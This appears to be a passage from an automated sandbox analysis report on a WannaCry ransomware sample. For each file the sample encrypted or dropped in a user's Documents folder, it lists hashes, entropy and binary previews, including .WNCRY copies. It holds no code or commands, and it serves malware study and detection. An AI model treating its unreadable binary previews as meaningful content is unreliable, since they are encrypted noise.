                                SSDEEP:24:bkhuwXmRYC8ZcyRtnAK2+a4vYp4BW2gGpkPRHm2Go9HqTF3zk5E+PGblAOc1EgHt:bkhf1vw+A+q5EQKT9KpPS2n7yyR
                                MD5:45DB52F5DCADCBCBF5D4947D11FE9214
                                SHA1:EB6DCC53A8BF48ADF264AB249FA0B591D403E193
                                SHA-256:970018BCF4D288217DA749021EE9B58A3CBF118F9E648A796DB663A7CC7FF9A8
                                SHA-512:E598534CB5D518D5DCBB2011D95B9EBCBD7BCB6E323F763D851F589F90852D5BA17FC44709C1EAC9CA4639DAC19518688431B58DEDEF40E0F8474A798280ED7C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....H.cB...>H.?..=.[..{..|..[.<w).K.........OVT(Ho...`....cQ?.....m$.iO..XNR..ru.....i5I.z....YNm....../.T...w,jmxn....6.M.M....>...K.......LS*.0N>6.#......=...E{.'N...Lr....d6...TU..A...A.../.}..>..m.e.7.../d.....!.=.;41..^.7Nb<.#....,}.k~w.F..~f..`Xp.9..............{ ]5d.9..cV-..hr...%.Bb..}.?./g.!....].S....G...Hpn.Hi&.."..]....&...d.[.,e.....3.....~..bz..S..Ab..2....a]....I.x......KI......mZ..{ ..z..a..C....p....x!.t..p..^....$..../.6.....%....(%.k.>..>.}.kZ2z...n+;*.a3.v.vB..VR.L..X..+d.;..G...N-..k).NE_....i...q..QlW.J,m..c......?u1*.L..#(..j.w..e...QN..F..U......6(.N=.L.U.l.#..L3.#._&..e.*..H........jq.>..tO........cs...o...V39BT..,[kAi..\)..%._a.@..U.6...o.Z-,........K.0`;*i%.k..D..aP..Y...&$.Nl......@Y..Lj..2!...u.Y...c.V.a.+r.._......Vx....\.|a...tG.._..(.`$5K...z......].;.f..........5..kS..3B..Z......d......U 3.^x=.M8?.}...NdO..6...#.Qs...L.....a...O....y..M..v....va.>....(a..*.........gO.>:.a.d..w9w....u...'q2.l....Og......

                                C:\Users\user\Documents\PIVFAGEAAV\NVWZAPQSQL.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.83754194698253
                                Encrypted:false
                                SSDEEP:24:bkhuwXmRYC8ZcyRtnAK2+a4vYp4BW2gGpkPRHm2Go9HqTF3zk5E+PGblAOc1EgHt:bkhf1vw+A+q5EQKT9KpPS2n7yyR
                                MD5:45DB52F5DCADCBCBF5D4947D11FE9214
                                SHA1:EB6DCC53A8BF48ADF264AB249FA0B591D403E193
                                SHA-256:970018BCF4D288217DA749021EE9B58A3CBF118F9E648A796DB663A7CC7FF9A8
                                SHA-512:E598534CB5D518D5DCBB2011D95B9EBCBD7BCB6E323F763D851F589F90852D5BA17FC44709C1EAC9CA4639DAC19518688431B58DEDEF40E0F8474A798280ED7C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....H.cB...>H.?..=.[..{..|..[.<w).K.........OVT(Ho...`....cQ?.....m$.iO..XNR..ru.....i5I.z....YNm....../.T...w,jmxn....6.M.M....>...K.......LS*.0N>6.#......=...E{.'N...Lr....d6...TU..A...A.../.}..>..m.e.7.../d.....!.=.;41..^.7Nb<.#....,}.k~w.F..~f..`Xp.9..............{ ]5d.9..cV-..hr...%.Bb..}.?./g.!....].S....G...Hpn.Hi&.."..]....&...d.[.,e.....3.....~..bz..S..Ab..2....a]....I.x......KI......mZ..{ ..z..a..C....p....x!.t..p..^....$..../.6.....%....(%.k.>..>.}.kZ2z...n+;*.a3.v.vB..VR.L..X..+d.;..G...N-..k).NE_....i...q..QlW.J,m..c......?u1*.L..#(..j.w..e...QN..F..U......6(.N=.L.U.l.#..L3.#._&..e.*..H........jq.>..tO........cs...o...V39BT..,[kAi..\)..%._a.@..U.6...o.Z-,........K.0`;*i%.k..D..aP..Y...&$.Nl......@Y..Lj..2!...u.Y...c.V.a.+r.._......Vx....\.|a...tG.._..(.`$5K...z......].;.f..........5..kS..3B..Z......d......U 3.^x=.M8?.}...NdO..6...#.Qs...L.....a...O....y..M..v....va.>....(a..*.........gO.>:.a.d..w9w....u...'q2.l....Og......

                                C:\Users\user\Documents\PIVFAGEAAV\PIVFAGEAAV.docx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.834673975545809
                                Encrypted:false
                                SSDEEP:12:Up1FIiTLXZ5L33duqXZPWwHQH+3DWpAMufMZxoKdK6zKWUbH9elRpLVo3ZbTJ4o:oISjL3rP5y+3iOSdKJlbH9oeZbT7
                                MD5:A392907AF32F21ABE00BA0AB29FDF5C3
                                SHA1:926422D5E0E82D5F9965355B8BB15F532646D8D9
                                SHA-256:8912017E30AAC220B5405A71BF82C8AA5B7A2762851734EA5042F01FE19C2EE9
                                SHA-512:963956FA034E37CCB29E44D04D05CB8862446210D78067BB0F7C145D1762B28457DF64FBEC8C640966B9A738874FB9D9303209CC6F9C6625EB9314F8BF47BAD8
                                Malicious:false
                                Reputation:unknown
                                Preview:Hsw.. U.....Z.u8d...cR.5...nO..U..@...B_5...'Q..........[..x...h..(..u....s.vVA7<.O..w...P...W.9..l(..$..OH......x..]..>...}.2..g."..Z...-..Z..$...*.pN~...AK......W......]....~.Q....t:.9....Y.=.v.O:.>.!.^.YXFKDV..h}.....4......gu....]..E.%L.........0L>.....7..@..#. x..5....V.zi...........]....%..tWki..~..c..t....+/..O...LK%.zE]..v...%..V...1...s.7...j+.$6.....F@.y0.r....&B...e.......{..x`.d.D...YSH..m...rh.s!.x..MP...x...2..[`Pr....H...#...F)...!.6.v>.!.#,i..@..|....D.. ...i.yl.v-e...y.U.u....|.....5B6./..n&l.qy.o...w......:..F.D...et..~...n.x..9.q F"...FM.ke.}o2...~..XE0!...u..=.....o.......j.e7=..{w.."..3A..X..@7.(.E.Ox....Uu...@.b6L..n.@...1.9Z..Y8.....i7L.%F..S..TQ..Bfk.g.w>&..."_vP...;G...S...x..2..u...6..[.{c..:|....] ...;2.!d$.>.ON..e.Is4..!.......ab.....Q..VS..ow..@P.Gm.7X../X...o...........mjH. .z..|..n..l.......]u)I.b....b.AhW/..'..M:&..!.n.E.R....\...o..<...N\...//l2a\.l.J........D=..+?.1..?Gm...+T..d9#.....R..\3-.}1..]..g."..pM..u

                                C:\Users\user\Documents\PIVFAGEAAV\PIVFAGEAAV.docx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.82833513809369
                                Encrypted:false
                                SSDEEP:24:bkJvsX9vbrJ/PhycChPYurBLYmByp1S1WedBn2T+EHDp6FXO3VXUYUyF:bkcT5P6YurBLFB6SEhT+/FXa3F
                                MD5:B29A55CD8011724A796CB7A63C0D260B
                                SHA1:0BEA878D1974DAA8FB970E97DB26DDDD449CC20B
                                SHA-256:E05EAB750EECBF54EFC2E6A140C9CEABBE37E130905D2EFFCBA94F39DC4AA54A
                                SHA-512:AF88FBDB87634A9EA6DD321E1C7780EF7639130A0BD7BF3C4A5D7E8B39522EBA628532FD0072377CAEFFC5D7C9D47355999A89BA589A5914B77FD4AD74A0FE13
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......<...4{ZY....g.@..4..h.....r.i......D..0..._U..-]X.5..6.Zf..+.a.....G...,Q_P....:....e>.......!..D.....:......}..Q^..bB:....h....3..../j,k..:P.........p(.....h{.-uOf.Tp@...J.c.......58!...V.Y.m....5..".vF..K...9J.UXo...., ......"..N..[../9[R....{O@X.............1Sbb....+.....H>.6 W..9..O..?".,...1!....h.h...}HB..&o...-~...8a..S.....6.....v...@o3a.....'.u..2......D.$M... U..)"..........8<.*.}.....x......f>7.j.......|2_.)ZJ. ./....~......_..K...e.f....^vQ<c^..H....&..E...Jw..M.f.Z..5~=...0.0..od..O_~....g.......ZI/....jXc...0.V.V=......"..{8...... .L..9]u....E?.DG.PyZ..ZXY3.......l.:....2.....s!..3..r..Od.v4E..3..`.IC.......eV.....h..E{.j.K......x.8.Y..3.E#U}..9.a.o..9y.<%r..P\.u..5.....cK3.....{"...$..d......e8.......%{b..bCl.....ayf.i.~.e3G..Ms..\!.J...8.L^e.g...lE.@.0C...To..!....?-.`.r.......=..1.8..s...>._Gk......(.S.>9s7.k.b..!...@.8...gq.@..QC...4pk=..]2_p............AN...~....5.8 ......Fy.D2..#.....?..N.}@.. ..v..~Q..;.

                                C:\Users\user\Documents\PIVFAGEAAV\PIVFAGEAAV.docx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.82833513809369
                                Encrypted:false
                                SSDEEP:24:bkJvsX9vbrJ/PhycChPYurBLYmByp1S1WedBn2T+EHDp6FXO3VXUYUyF:bkcT5P6YurBLFB6SEhT+/FXa3F
                                MD5:B29A55CD8011724A796CB7A63C0D260B
                                SHA1:0BEA878D1974DAA8FB970E97DB26DDDD449CC20B
                                SHA-256:E05EAB750EECBF54EFC2E6A140C9CEABBE37E130905D2EFFCBA94F39DC4AA54A
                                SHA-512:AF88FBDB87634A9EA6DD321E1C7780EF7639130A0BD7BF3C4A5D7E8B39522EBA628532FD0072377CAEFFC5D7C9D47355999A89BA589A5914B77FD4AD74A0FE13
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......<...4{ZY....g.@..4..h.....r.i......D..0..._U..-]X.5..6.Zf..+.a.....G...,Q_P....:....e>.......!..D.....:......}..Q^..bB:....h....3..../j,k..:P.........p(.....h{.-uOf.Tp@...J.c.......58!...V.Y.m....5..".vF..K...9J.UXo...., ......"..N..[../9[R....{O@X.............1Sbb....+.....H>.6 W..9..O..?".,...1!....h.h...}HB..&o...-~...8a..S.....6.....v...@o3a.....'.u..2......D.$M... U..)"..........8<.*.}.....x......f>7.j.......|2_.)ZJ. ./....~......_..K...e.f....^vQ<c^..H....&..E...Jw..M.f.Z..5~=...0.0..od..O_~....g.......ZI/....jXc...0.V.V=......"..{8...... .L..9]u....E?.DG.PyZ..ZXY3.......l.:....2.....s!..3..r..Od.v4E..3..`.IC.......eV.....h..E{.j.K......x.8.Y..3.E#U}..9.a.o..9y.<%r..P\.u..5.....cK3.....{"...$..d......e8.......%{b..bCl.....ayf.i.~.e3G..Ms..\!.J...8.L^e.g...lE.@.0C...To..!....?-.`.r.......=..1.8..s...>._Gk......(.S.>9s7.k.b..!...@.8...gq.@..QC...4pk=..]2_p............AN...~....5.8 ......Fy.D2..#.....?..N.}@.. ..v..~Q..;.

                                C:\Users\user\Documents\PIVFAGEAAV\SQSJKEBWDT.pdf

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.831093310456125
                                Encrypted:false
                                SSDEEP:24:mx1iWNbT4FKV5BQQkHlA3Ijmr6QoP9W/9GM64Z05zeIBzshOdM:mvBMC2w3ILhVW/4MBEzeIBjdM
                                MD5:304E2BDB46283B48B9C4115AABB51C86
                                SHA1:0A4D98A9FA3699A7CBA61FD86F28317AD8567B11
                                SHA-256:CA5EAA4F5C3695F96BF3C51650DF39A3F77F2BB58897A201011890053EF7A551
                                SHA-512:9F054E1ED6D0BEC131A0178673C9CF538F462A9DC299B6A331D5537252220352150634376C612CCFBC8FB8FE748AA31C9EBC1D2D56BF16604AEDEC31937EF73A
                                Malicious:false
                                Reputation:unknown
                                Preview:.C........2....@.F..&...G-....o,v..b..o.....!;...<v.bT.j.~.7B.z.i........[..U.f.....,k....".....9*....).P......gXE.?......L.....ma.....s@.j.}.q...Yr.%.B.\...:...3..Ws..U.:.n..5e)U.....[v.0O}Q..0iw..@....j...0...%...\.A...5...W.%.....,.........=D.....V..<..J..-v..".l.7..$.4.E..].....A.k..b5O...aTe....;..jYV..5.n...P....Z....X.1..0F4T.L..@....V(.x*Xo...0$..`4..K.E.(..b.y.s+6..O..,.i.............n.....[.;o.D...l......*".,.t_. y8t...NB...X=..d............fRXH..x......HS.xE2......%U.S.>Q./y..]G.*..H.fx.F.(.L(.E<2....b..P._./.[..QC..z....{..:....}..5{.:.......A.d......g....Z2%N&...ev..U73.._...p.0}....d...1/.?.....U..V.|T.%..P.`.....B..8Qj.k..c.m.UDG.....P.u.x..{J....>..>..q.dpE@.....T...MA...6.?....^N...m..u.W|.a......)..&qa...F.L.c.aB%..b.>..sP.z~..v.{QvI..d...v.q...(e..".v.t.wS.H.[.D-.......829Y.<.T._.-..p...Z-W.C.a9..n.k..).u65.nug.X?...+#.5.'L.....y.....W.5|m.....<..j..J.8~.F..Py ....7....b....:...u..t..r).v]TN:.....>.Ww...VQ......qqy..#

                                C:\Users\user\Documents\PIVFAGEAAV\SQSJKEBWDT.pdf.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.840596828301155
                                Encrypted:false
                                SSDEEP:24:bk4xCTTcN08KoooK5DpBPIRQoPXKAiwLMLXT1AJPFX7o+:bk5Ohbe5lINiwLMLBApFX0+
                                MD5:769E75EF98DFED5AEA7BF7CC859944CD
                                SHA1:14534DF8041EEE8CC485BD6F7574A60231613DEE
                                SHA-256:568D9AB9A647FD920F1E6C5C195375EC336357DE0A1B9DB1732D7D385E12ED64
                                SHA-512:72A89724AD8693148DADBDBBC8F424FA4CBD455BED38E9D5F0B7D40716F50859152E468388F74E201ED71332FC77F29E84B27F2A6742DF0C903FE3032D7BD6CE
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....|.{.v....R.rPd..x..v......&.B.........f....*A.?>2.v....t.>q..~............+Rg.W....@...v.xIM..H...D.&..?..O.H.P.k*Mm......TG.p...5...^q..........n.... 97....[..h..,.7.]..p . r]...{.>. .ke.`....p.!....1({.dX..#H.!......0JS.........:.W.....................bg^B..B.&..<..3....&...l....].......C"9.....rQ....F..^CY..D-1p,.\..oxZ.4....'.... @|..ah.7...e,UP........y..`...A....G>I...N..d..7.......`#......X:.^^..A.....Q.6.........Y....@Nl.{|.."j.C....1r.U..=.M$.........#q$G..k-.?....11.K...%B...%.'..g.w.cq0.....i..._2F.a.0[.v......../*8.c..Gj....n]....(...6.g.X5..?..AT.......:-..G....<'4...TV...Y..N......b..H.t.......]...,.qn..@_.`-.\S.k...2.{.z....]..S.P..Y.U...}....fu.I[...Ij...};MjN.C.o..9U.@..cj..o/ ..8.ZT8...).}.21Q.,n<.c.RQ..'.K.k.2H.U.?..C._...O.K..9..{.'.k.i.d..g....[o@i..D6W-.:l....e...?7dz.6..4..... p*./...o......cA#4.2=..o.h;)..F?......eI...*.$v.L...k.2j..n... r..D.....2.2.....^.....{...Z....A..-axW.'....d).DK.e^.SN.2.x

                                C:\Users\user\Documents\PIVFAGEAAV\SQSJKEBWDT.pdf.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.840596828301155
                                Encrypted:false
                                SSDEEP:24:bk4xCTTcN08KoooK5DpBPIRQoPXKAiwLMLXT1AJPFX7o+:bk5Ohbe5lINiwLMLBApFX0+
                                MD5:769E75EF98DFED5AEA7BF7CC859944CD
                                SHA1:14534DF8041EEE8CC485BD6F7574A60231613DEE
                                SHA-256:568D9AB9A647FD920F1E6C5C195375EC336357DE0A1B9DB1732D7D385E12ED64
                                SHA-512:72A89724AD8693148DADBDBBC8F424FA4CBD455BED38E9D5F0B7D40716F50859152E468388F74E201ED71332FC77F29E84B27F2A6742DF0C903FE3032D7BD6CE
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....|.{.v....R.rPd..x..v......&.B.........f....*A.?>2.v....t.>q..~............+Rg.W....@...v.xIM..H...D.&..?..O.H.P.k*Mm......TG.p...5...^q..........n.... 97....[..h..,.7.]..p . r]...{.>. .ke.`....p.!....1({.dX..#H.!......0JS.........:.W.....................bg^B..B.&..<..3....&...l....].......C"9.....rQ....F..^CY..D-1p,.\..oxZ.4....'.... @|..ah.7...e,UP........y..`...A....G>I...N..d..7.......`#......X:.^^..A.....Q.6.........Y....@Nl.{|.."j.C....1r.U..=.M$.........#q$G..k-.?....11.K...%B...%.'..g.w.cq0.....i..._2F.a.0[.v......../*8.c..Gj....n]....(...6.g.X5..?..AT.......:-..G....<'4...TV...Y..N......b..H.t.......]...,.qn..@_.`-.\S.k...2.{.z....]..S.P..Y.U...}....fu.I[...Ij...};MjN.C.o..9U.@..cj..o/ ..8.ZT8...).}.21Q.,n<.c.RQ..'.K.k.2H.U.?..C._...O.K..9..{.'.k.i.d..g....[o@i..D6W-.:l....e...?7dz.6..4..... p*./...o......cA#4.2=..o.h;)..F?......eI...*.$v.L...k.2j..n... r..D.....2.2.....^.....{...Z....A..-axW.'....d).DK.e^.SN.2.x

                                C:\Users\user\Documents\SQSJKEBWDT.docx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.807039241974979
                                Encrypted:false
                                SSDEEP:24:3/wAigFVAV4Q8ue9USlpcqroTMa/Yco4bJIGlRA8cJkIncQG:PiV4LtpcYay4bPAL6dJ
                                MD5:28ABEDDC7CD30E2CEA9273076138ED65
                                SHA1:E9D36F19CEF016E58F086E15E41561EB3C24AAAC
                                SHA-256:B0C691392A5AE2BAA6EEBB09DFF114E23EBA74A64CB96CB558BEF78FC5EBC9D5
                                SHA-512:9CDE0D0404469BB61EC877142CAEFFC9515F2C60078DDEDFB612286FC2F5031BB9EDB2C4B39037F3E492554C65E5B8453FFE1E8B6CB6E956CA4CE5DF75B44027
                                Malicious:false
                                Reputation:unknown
                                Preview:......-U*.rw...iV..u3..+.K.*J.....".B.'..m..~..Y.!.L..x^..%................. _...d.g~.xD....|H...Z$.P.H....!.../.]..q=.Z.k.,V..[.....`.....|.pA..n{.9.h...........t..6....,......j..{..Hz.3..~..'4......F1.. }w.....C.........q.c.1<.......9v8Q=..^Z).w......IH....\rE}%>.b....;j.9.1..#...AP.y....D.n.....T6...=.r..d........phr^O...z.j.....Z.~.G.qM]?T1-.r..._).R.mO..I..6.8k).z.H.G.<...\r.D`-Cr5.....a....aW.......p.$R.......;(./........s...Ju..........)IF........0..R"J.o`..;y\H}.G.....>&._.n.#?".....ha..!.Y...t.W..[......Uc..FB1.u..d.........._......&9_..J;.R.Ak.xY.e...2.%.Ll.z~^.....+...e|....^..O-TH8..G...s7..0..#...\...}.G.h.u./Vy.W]....C....la...;,......:..[..U.#...nH..-mtK|1.....k.d...T(......^[..7......K.<......k.l...d..!z.....W.d_h.T..U.#=(..........L......*.....l..rVh....F.?.Yx3...Y(.J.....1o.."H[3..~o........L.Y....M.F..(.:.N..{.\.Fx-..L....Q...N..4....0Ag.......y.,.e..cHc...M.a....@V..\...Q.D..r.c+0...U.\...k.S.dA.]...Q-.a.........m.64.".

                                C:\Users\user\Documents\SQSJKEBWDT.docx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8233636499914105
                                Encrypted:false
                                SSDEEP:24:bkDQselqW8bUsTOC5qg4yvT9fAksEW+cG/DvP/GW4BO179twtJ22erty6:bkDQHlmTTEgTVOaDvB9tyJ2lL
                                MD5:6EE0D43857087E2542224570894745CD
                                SHA1:56009AD68B1843A37C0907A028EEE46A76A4DAEF
                                SHA-256:8D163111354CD9F93864003FA78D48754D0BF2467F46A55C843C8ACF7580B3F3
                                SHA-512:FC65C419BCA0EDA64C1926322848DA192BA7BB1DF1E4919B0F5ED2BBFD590D68D52DAA4BC6DA90A46CEEA8B6D4053C60E8EE9F4057DB8546EB38A58E85D3A01E
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!..........Q..U.C.xu.......>2..:.2b..X.k..z...B....\n..EB..#.E..p+..V5..s...jC...... ..'..=.....Y/....Dl.b..."4.@..c.eqC..x.k.}........#..4(..1fe........aMv....u.2....}s....S..k...."5u......p....&.zN.....m....E.....a|..dmzU.....u...JN+qOF.:..yoo................F..I.v8".|....v.>..~..qb.@..&.v{.b.-..]...N........3i.N..yr.......N.C.g...r.N....<....J.VPEhE.......r.uA......1....t2Z.]..E..H...}.r...z..$....a^Y4...S. ....GiVT.&.....x..nF.*.........Q....w.(..R......G.N|..qu.&x.....:).H.U.&.Pq../4..U......4...s.3..d. ..E.l..Z.Po......i3...U..:....8...;.uhhT.clw..J..y..YS.x.(......T.-..~...a..... -.>.T..S....S~?A..A..'..c=.-...jE.m.Z.l..@F..f.9.....z...f1...i.!..]U.F..V..Hs...(.N..l'.x..d.7.R)....4.%hh^.]...A..........\s.n...mU..0....ou...m;6.D+.#rx..L......E.V\?..y.}.......1...L....Be..9..@.W.o.cK.!t.#3..X.}K.t......BY.q.!..7......5C.\E...+....a....#..~2L..B...8.cA...!#.ke.J.Z...kb7.}...12q.....,...rn(.L.:.U.'.bfD.`(f.,.Z....E....>"..;.,...'%.a$.

                                C:\Users\user\Documents\SQSJKEBWDT.docx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8233636499914105
                                Encrypted:false
                                SSDEEP:24:bkDQselqW8bUsTOC5qg4yvT9fAksEW+cG/DvP/GW4BO179twtJ22erty6:bkDQHlmTTEgTVOaDvB9tyJ2lL
                                MD5:6EE0D43857087E2542224570894745CD
                                SHA1:56009AD68B1843A37C0907A028EEE46A76A4DAEF
                                SHA-256:8D163111354CD9F93864003FA78D48754D0BF2467F46A55C843C8ACF7580B3F3
                                SHA-512:FC65C419BCA0EDA64C1926322848DA192BA7BB1DF1E4919B0F5ED2BBFD590D68D52DAA4BC6DA90A46CEEA8B6D4053C60E8EE9F4057DB8546EB38A58E85D3A01E
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!..........Q..U.C.xu.......>2..:.2b..X.k..z...B....\n..EB..#.E..p+..V5..s...jC...... ..'..=.....Y/....Dl.b..."4.@..c.eqC..x.k.}........#..4(..1fe........aMv....u.2....}s....S..k...."5u......p....&.zN.....m....E.....a|..dmzU.....u...JN+qOF.:..yoo................F..I.v8".|....v.>..~..qb.@..&.v{.b.-..]...N........3i.N..yr.......N.C.g...r.N....<....J.VPEhE.......r.uA......1....t2Z.]..E..H...}.r...z..$....a^Y4...S. ....GiVT.&.....x..nF.*.........Q....w.(..R......G.N|..qu.&x.....:).H.U.&.Pq../4..U......4...s.3..d. ..E.l..Z.Po......i3...U..:....8...;.uhhT.clw..J..y..YS.x.(......T.-..~...a..... -.>.T..S....S~?A..A..'..c=.-...jE.m.Z.l..@F..f.9.....z...f1...i.!..]U.F..V..Hs...(.N..l'.x..d.7.R)....4.%hh^.]...A..........\s.n...mU..0....ou...m;6.D+.#rx..L......E.V\?..y.}.......1...L....Be..9..@.W.o.cK.!t.#3..X.}K.t......BY.q.!..7......5C.\E...+....a....#..~2L..B...8.cA...!#.ke.J.Z...kb7.}...12q.....,...rn(.L.:.U.'.bfD.`(f.,.Z....E....>"..;.,...'%.a$.

                                C:\Users\user\Documents\SQSJKEBWDT.pdf

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.813992415166788
                                Encrypted:false
                                SSDEEP:24:KR2ukTravRDPhAT3KXJW0bp9Yy+zQGBupSy0sltI+HGz:KR2DTraPATad9YyBausCtI+8
                                MD5:F56BBC05AA259652819874AE0D852CE8
                                SHA1:6241529FFD94507DB2EAE38FC327C9AF16BC7A9E
                                SHA-256:9F66F87C21B9BA46BCE444C5D29AFFF55BF2386B998D0D0F674E295042C2D8A8
                                SHA-512:C05E8A62671EE276443C3820F669092101A8F2CD6BB97838355A192E48B2AEBB2EB57AD85A3C7B948ADC593FC73F620FF9A3E2339C7AEF39AF74C7917A5A59BA
                                Malicious:false
                                Reputation:unknown
                                Preview:.N..9..i|..9e9-...G.Li....w.S....z..H...`..9..1......&C....x'].!..l....;. .N..[......@..C.V.....*1;..P....:Q..M........+....j....O=m.....<...z"M......|l.\PC....Y`t.".5*.\...^8D...J.....O.{|...N7.J...H..nK[_.t...CwB;..".5xf...84.{%;.6..aHF..a.........{...z...""+.q.)....[.<......b....O..x^xsD...l....."T.M8.Q..!-.4r..u:.7h...R>K.mA.\.C./.....R-...._7Wt..`........[b.....3.9...2/..X..y....R.C...3J.0....Sq......j..)C.0?.FR..S.V=X)mM.._....g.d.DH....?.....' ..g{|8$.5.4..S...WI.7.n..{........"...,j......K.Q&r1.luC.s.T...G|..g..O.Q.:..;&..+L.a .b.n....C.T......P.o...$.S]p..'......h......?.t.h.}.#@J..Q...{.g-\..F.]W.....0~.5..r...6..=f.$>].x8.r.K.$.3:Xo8..E.M`..B f.*.|k..Q.#.tLdh..o...e.[..R.....a..d.;.5S..Vd.Uz-.A.=a..>......4..tY2...\r.Gv$_6...`..A.WG..8.....K..h..b..u.+...6yd.@.4.U..d.......%.X.&...Q.0vH....v#...1.2%..q.7eDO{F.f.D?/^..!.88......1u..r......)Di.H.ue.........Q@.4.......S....9.g.jf.?..S.Hd?.bb.......v.A..Zx...;...+h..T..I\v..N.

                                C:\Users\user\Documents\SQSJKEBWDT.pdf.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.87276983399508
                                Encrypted:false
                                SSDEEP:24:bk9fRSvwxRLiM16s9n6vCe/T4iRVNzWBJi+Tnpf186119YxY347pcquopxwDGFCD:bk9fAORRws9C74iRXuEspf182qC47pcl
                                MD5:55306471244D0513BB6D0B7CDA7A7DCF
                                SHA1:B00F1A9057DE571907423E8B9BEFB18341D5E19E
                                SHA-256:01AFCE5C3AD33BF8D915EB50A66076C3FCEE80384752FF21F60015FDD454955B
                                SHA-512:F30A59A70D240D16B5491FE96A6BC92C3B262768BAF99C71F74EAC36691B5E5327C659C803BFE1D7FEC9EEBF9AE73D58A295F11F0F5D1C2765DB4A5AD032C3EC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....O./'...L8..<....P.1q.`r...[...^..T.......cp\..b3U0].b.[...@.{R.I......=Q6.w.O."\b..k.>,..UK.O.O..;...K.tt.....F,.h.f-T2rP..w?.R..\j..~..........ngr...GX..Y..8o.!..../.I.*..##z......?e...9.l....+1B.<........t'.y...>*..q...7.~=C}...o.g.#...?.gF.11+.............v.lV.GW..,_.VT..Lm?.A.tc.l..q..X...r....L.......!.3....;.a..%.M.H.........}..Z.T..3.HS....6j.{...a9...e.../........k!M......./"...S...@h...).|.....Z......V.N.........D..'.V...x...P.....B.ko-.OF.\}...V.G.,...+.n....q..#..Lqi.&../...`......Q...X.+.y.(GS.....................#.....;.{5cw..(.z.#.....4.ou......k.h.q..h.Z....O....9l.[.:Y|}.JbP..d.Cb...H.V...j.....@..s.F.`......2.f.c...J...>T{>...Jqs....9.:1,..kd0Y.,..!..............Y.jd7.P$:"....s...........Ra.....)..{d....6suC.+)G..}W{.V..EC(V..._......&9./lxJ.!{(h.N...Z.*...p.`..?i...&...0........b...&M..X...QR....-.7..+:MZ.EIE..t...Z.p.[.......M.....LP.H.]...p.o4}..Z....AN.O..+h._5Iz...c.J.T...6.l..}.V..N..v..!-.yG..Ta......s..M.m

                                C:\Users\user\Documents\SQSJKEBWDT.pdf.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.87276983399508
                                Encrypted:false
                                SSDEEP:24:bk9fRSvwxRLiM16s9n6vCe/T4iRVNzWBJi+Tnpf186119YxY347pcquopxwDGFCD:bk9fAORRws9C74iRXuEspf182qC47pcl
                                MD5:55306471244D0513BB6D0B7CDA7A7DCF
                                SHA1:B00F1A9057DE571907423E8B9BEFB18341D5E19E
                                SHA-256:01AFCE5C3AD33BF8D915EB50A66076C3FCEE80384752FF21F60015FDD454955B
                                SHA-512:F30A59A70D240D16B5491FE96A6BC92C3B262768BAF99C71F74EAC36691B5E5327C659C803BFE1D7FEC9EEBF9AE73D58A295F11F0F5D1C2765DB4A5AD032C3EC
                                Malicious:false
                                Reputation:unknown
